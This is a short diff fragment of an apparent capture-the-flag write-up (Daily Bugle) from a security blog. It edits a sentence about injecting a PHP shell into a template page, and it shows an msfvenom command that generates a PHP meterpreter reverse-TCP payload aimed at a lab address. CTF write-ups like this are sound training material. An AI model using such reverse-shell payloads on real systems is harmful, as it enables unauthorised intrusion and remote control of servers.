PacketFire/packetfire_site/content/post/daily-bugle-boot2-root-writeup copy.md

 ```

 ### Catching a shell
-It wasn't long before I found a path to the template page that I could inject a php shell into and I generated a payload using meterpreter.
+It wasn't long before I found a path to the template page that I could inject a php shell into and I generated a php payload using meterpreter.

 ```
 root@kali:~/ctf# msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.182.144 LPORT=4444